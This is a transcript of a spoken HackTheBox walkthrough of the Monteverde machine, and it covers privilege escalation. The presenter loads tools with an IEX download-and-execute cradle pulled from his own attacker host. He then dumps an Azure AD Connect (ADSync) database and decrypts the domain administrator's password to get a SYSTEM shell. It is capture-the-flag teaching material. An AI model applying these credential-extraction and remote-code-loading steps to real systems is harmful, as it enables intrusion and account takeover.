Hey YouTube, what's going on? I'm Rocket, and this is part 2 of my Monteverde HackTheBox walkthrough series. This video is going to be all about enumerating for privilege escalation attack vectors, where we ultimately end up finding a database that happens to be the artifact of a password hash synchronization action with Azure Active Directory. It turns out that the domain admin's password is encrypted in a hash, and we're able to decrypt that. Decrypting the domain admin's hash, we're able to use those plaintext credentials to then log in as the domain admin, fully compromising the host. So without further ado, let's get to it. So at this point, I like to quickly run the whoami with the /all flag to see if I am part of any group that I can use to quickly abuse to escalate my privileges to admin. So in this case, we are part of the Azure admins group. You can do a quick Google search for pen testing Azure admins, but I've already done that and it's not really applicable to this box right here. So I'm just going to quickly skip over that for the sake of this video. Perfect. The next thing I like to do is run the GCI command, which stands for get child item, with the -REC, which is shorthand for recurse, under directories that I have access to. So here, the thing that stands out to me is this tokencache.dat file under the .azure directory. So let's take a look at that. So we'll go GC for get content. And this here is a Azure token file. The thing with Azure token files is that they're used for authenticating into an Azure session. So if the identity of this token belonged to an Azure admin, then this would be really bad for the organization if the wrong person got their hands on it, because essentially you could go add a backdoor user to Azure Active Directory, and then when this host resynchronizes with Azure Active Directory, the cloud, that backdoor user is going to get synchronized onto this host right here, and then you can just backdoor your way in. But there are two caveats. So the first one is this token expired? So we're going to check that right here. So here's a timestamp. I'm going to open up a new command prompt and just say date-d and then @timestamp, and it looks like this token is still valid. It expires Tuesday, 19 October, this number right here. So that's definitely bad for the organization if they had that. The other thing to check for is if you have MFA or multi-factor authentication enabled on your token. So let's say if I were to try to abuse this token, then you'd have to enter a code provided by your phone, for example. So I wouldn't just be able to become this token's identity just by getting this token alone. I would also need, let's say, the person's cell phone. And this kind of applies to any cloud technology if you're trying to secure your cloud deployment, not just Azure, but like Google Cloud Platform or even AWS. So always make sure to enable multi-factor authentication. However, that said, this is a hack-the-box machine, so if we were to try to abuse this token, we would have to kind of escape the hack-the-box virtual private network so that we could just use this token and go towards the internet. But I don't think the internet has inbound access to this host here, at least not directly. So I don't think any sort of password hash synchronization is going to go on anytime soon for now. That said, let's move on. So at this point, I like to go up to the users directory and see if I can also see if there are also any other directories that I might be able to access. So in this case, there is a directory that says AAD, probably stands for Azure Active Directory, followed by some sort of hash, admin, mhope, and public. So here I'm also going to run the GCI command with recurse. And I'm also going to specify -EA for error action to silently continue. This here means, okay, if I end up trying to recurse a directory from which I don't have permissions over, I'm not going to get errors all over my output. So let's just do that. So it looks like we have the same stuff. Oh, I also had a WinPs here from my previous enumeration of this host. I'm just going to delete that. So we'll go to this directory here. I like doing into the music directory. But if you're curious how I ended up transferring this file here, I simply did new object system.net.webclient.download file. And then I had a web server on my Kali machine, so I'll go to tools, priv-esc, privilege escalation awesome suite, find all names that end with .exe, And let's take the 64-bit release one. And then just spin a Python server right here. Or sorry, HTTP server with Python. So I'll just say HTTP 10.10.14.48 because that's my Kali machine's IP address, port 8000, and it was winpeas.exe. And the directory was this right here. So C users mhope music winpeas.exe. So we can see that we did download it, and there it is. So we're just going to run this to quickly auto-enumerate the host for purely escalation attack vectors. And one of the reasons why I like WinPeas is because it colors your output. So if something's red, it indicates that, hey, you should definitely check over this. If it's green, then that configuration is probably secure. So while this is running, we can still take a look over it quickly. So the first thing is laps is not installed. So this hints that the admin password is not changed frequently. So if we find an admin password somewhere, chances are it will still be valid. So that's good to know. Credentials guard is not enabled. So if you got access to the admin, or well, if you became admin, then you could run a tool like Mimikatz and dump all credentials from memory. Anyhow, moving forward, we see a bunch of green things, which means that they're likely secure, like there's nothing wrong there. We check some Firefox databases, Chrome databases, some browser stuff. We find common salmon system backups. We might take a look at that afterwards. Keep that in the back of our head. We're looking also for possible password files in users' homes, so we might take a look at this here as well. So far, we have two things we might want to take a look at. Actually, wait. I think we skipped over a few things. Let's go back up a bit. Actually, let's start from... Yeah, let's start again from here. Okay, so we keep going down. There's nothing too interesting here. Maybe one thing to point out is PowerShell does have Azure Active Directory modules installed, so that would be how an attacker might want to abuse that session token that we found earlier. Is you can run certain PowerShell commands to integrate with Azure Active Directory. So if we want to debug any sort of those programs, we might take a look at certain paths like that, which might be handy for later on. Good to know about. No AV detected. I think that's a lie, because on most Windows 10 installations, you do have Windows Defender enabled, and it also has an exception saying invalid namespace, so false positive right there. Auto-login credentials were found default domain name, but no password associated with it, so we're not really interested in that. Home folders found, we've already enumerated those. We'll look for any unquoted service paths that include spaces in them to see if we can do DLL hijacking on them, or even just service hijacking. Turns out all the ones with spaces are indeed quoted, so they're safe and secure. We do see a SQL agent right here, so that potentially hints that Microsoft SQL Server is running. Definitely a service that we didn't see when we read our initial nmap command in the previous video. We also see some Google Chrome stuff here, which might be worth taking a look at, but we'll keep that in the back of our head for now. Keep going down, moving forward. We do see a local service that happens to be, well, I'm pretty sure it's SQL Server. Port 1433 and port 1434 are generally SQL Server installations. And it makes sense that it's listening locally, because why would you want to expose your database to the outside world? And a bunch of ephemeral RPC ports, which we're not interested in. Another really interesting thing here is we do have the DP API master key. DP API master keys are used to seed Microsoft encryption algorithms. So if we got our hand on one of them, which it looks like we do, we can use that to potentially decrypt certain secrets. So that's good to know. And here were the things that I was talking about earlier. So let's just do a quick check on this right here. So let's do a ls. Back Sam. Okay, so maybe we can type this, or GC forget content. Permission denied. Okay. Good to know. Let's see if we can't access this other one. So we'll say GC forget content. Try to access this. Access is denied. Okay. So at this point, on the top, I just did that because it was really quick to do. It doesn't hurt to make that check. But the thing at the top of my list is the database. I always like, when I see a local database, I always try to enumerate that because they generally happen to be treasure troves for privilege escalation. So why don't we just go investigate the database? So to do this, because I'm in a WinRM PowerShell session, I'm a big fan of using this tool called PowerUpSQL, which I can show you right here. So if you do a Google search for PowerUpSQL, you will find it, and you can just go ahead and clone it and download it. They also have a wiki that you can use, or cheat sheets. I highly recommend you check out the cheat sheets. And for this, I base most of my commands most of my database enumerating commands from here. SQL Server data targeting cheat sheets. So you might want to add that to your bookmarks or keep that in mind. Anyways, moving forward. At this point, we need to download that. So I already have a local installation of it. Let me stop my Python 3 server right here. So I'll go to PowerUpSQL. PowerUpSQL. There we go. And I'm going to host another HTTP server right here. So Python 3-m for module http.server. And we're going to download PowerUpSQL and then load it into our PowerShell session's memory so we can use all of its functions. So here we'll say ix new object system.net.webclient.download string, and my Kali host is 10.10.14.48. Port 8000. That should, oops. Oh, sorry, the given path not for short. I forgot to put HTTP. There we go. So that got our PowerShell script and executed it. It downloaded it because we're just telling the web client to download the string, and IEX means invoke expression. So we download the script and execute it. All right. The cool thing is now with WinRM, you can actually go menu, and we'll show you all the functions that you can use. So in this scenario, I'm going to call get SQL database, and I'm also going to put the no default flag because I'm not particularly interested in the default databases that SQL Server installs, at least for now. If I don't find any defaults, I might just run this script without the no default flag. So let's go to run. And it turns out there is an AD sync database. This looks very interesting. The next thing I like to do is enumerate the database for secrets. PowerUpSQL lets you do that by searching for tables that have certain column names. So to do that, I am going to run the get SQL column sample data threaded command. Use 10 threads to speed it up. Do not enumerate default databases, so no defaults. and then pass some keywords. So keywords are going to be the columns and the tables that we care about. So password, secret, private, and cred. All right, let's run that. And I really like this because it's just a really quick way to, we can just go through the entire SQL Server and quickly see if there's anything that's relevant to us. So we see a lot of password hash custom data compressed, which might be interesting. Let's see if there's anything else. The other thing that's interesting here is this private configuration XML file, because we can see certain data that is encrypted, and we also happen to see a sync Monteverde, some sort of account at outlook.onmicrosoft.com. So yeah, it also looks like this happens to some sort of synchronization action. And so at this point, let's take a look at some of this data. So I'm going to take a look at the private configuration XML and this management agent object. So to do that, I'm also going to use PowerUpSQL commandlet, but this time I'm going to say get SQL query. And this time I'm going to say query. I'm going to say something like select private configuration XML from MMS management agent, and we can just dump that output. Oh, that didn't work because I didn't specify the database, so you have to say -database, and the database was here, ADSync. So let's try that. And if you just dump this in regular PowerShell, you won't be able to see anything, so we have to pipe this through the select object. Let me just move this. Let's pipe it to select object. And we're going to run the expand property command. Use it with the expand property flag. And the property here is private configuration XML. So that should dump everything for us. Excellent. So reviewing this output more carefully, we notice that there's some sort of like password that's potentially encrypted. We know the Forest login user is administrator. The Forest login domain is also going to make that local. So the password might very well be the administrator's password. So we're on a good track so far. So Forest login domain, local. The user is administrator, and the password, which is probably associated with the Forest login user and domain, is also encrypted. Interesting. We also have the password hash sync config enabled, and there's a target right here. So if since this is encrypted, the quickest way to move forward here would just be a quick Google search for decrypting ADSync database password. So let's go do that right now. And if we scroll down a bit here, we'll find that Fox IT has a tool to extract AD Connect passwords and decrypt them. So this is super handy. I took a look at this. I didn't use this tool. I did, however, take a look at this blog right here, and I used this instead. Here you can read this article here to get some more context on how a password hash synchronization will leave these artifacts behind, and then you can just go and decrypt that password. So I'll link both of these in the video description below, and I'll also link the video to see if you want to dive deeper into some of the research behind this password hash decryption. So if you keep scrolling down here, we do find that the researcher gets to the point where he was able to dump this XML file that we just found a few minutes ago. And then he says, to decrypt the encrypted configuration value, I create a quick POC, which I will retrieve the keying material from the local DB instance before passing it to the encrypt.dll assembly to decrypt. So the encrypt.dll assembly is probably located on the victim host, and we can just leverage that to decrypt the password. So simply enough. And if we read the script, it takes certain parameters, one of them even being entropy. So like I was mentioning before, the DP API keys, those are used as entropy seeds, and that's probably why we were able to see them. So this makes this exploit all the more reliable because they're probably used in this formula right here. And then, yep, he grabs the private configuration. He also grabs an encrypted configuration, which is interesting. So encrypted configuration is probably the table where the encrypted password is located. So from here, I'm just going to quickly download this script and run it. So let's take everything, copy, and then moving back to the Kali machine, I'm going to make a directory called privesc. I'm going to create a file called decrypt hash.ps1. Dump the contents, go to save, and before I go and run this script, I kind of want to just debug the connection string, because sometimes if something doesn't work, you don't want to be left in a confused state. So always good to break things down. Let's go back here. Oops. Create our client object, and then we're going to say client.open to open a connection with the database. So this clearly failed, and the problem says it's unable to locate a local database runtime installation. So whenever I see something like this, I tell myself, like, how would this actually work on an installation that is sane? Because clearly it looks like there's something missing here. There's no database runtime installation. So to troubleshoot this, I just set up a environment with SQL Server on it, and I ended up changing the database connection string. So instead of this stuff right here, I had something like server equals localhost and database equals, in this case it's AD sync, and trusted connection is true. So let's see if we can't open a connection with that. So let's take this, go back to our WinRM session, recreate the client, and ask it to open a database connection for us. So that worked. We can see that we have a connection with AD sync. Amazing. All right, so at this point, I think it's pretty safe to just run the rest of the script. So again, I'm going to say do Control-R, IEX, to get my download shim. And instead of downloading PowerUpSQL.ps1, I'm going to download decrypt hash.ps1. I'm also going to have to host the Python HTTP server from this directory, because I think I already have one running somewhere right here. No, I do not. Okay, so python 3-m http.server. And let's see if it works. So something happened right here. Some error happened. However, this does look like a decrypted password. So let's see if we can't log in as the administrator with this password right here. So instead of using WinRM, I'm just going to run a psexec. So I'm going to say psexec. And I'm going to say administrator. Use the password at monteverde.htb. And the command is going to be just cmd.exe. So that didn't work because we needed to quote something. We need to quote the password. That's good to know. Let's quote this in single quotes, so no special characters end up being interpolated. And we have a system shell. So if we say who am I /all, we are part of the administrators. Perfect. So at this point, let's see if we can get the root flag. So go to C users administrator desktop, do a dir, and there's the flag. So I hope you enjoyed the video and learned something new, and I will see you in the next video.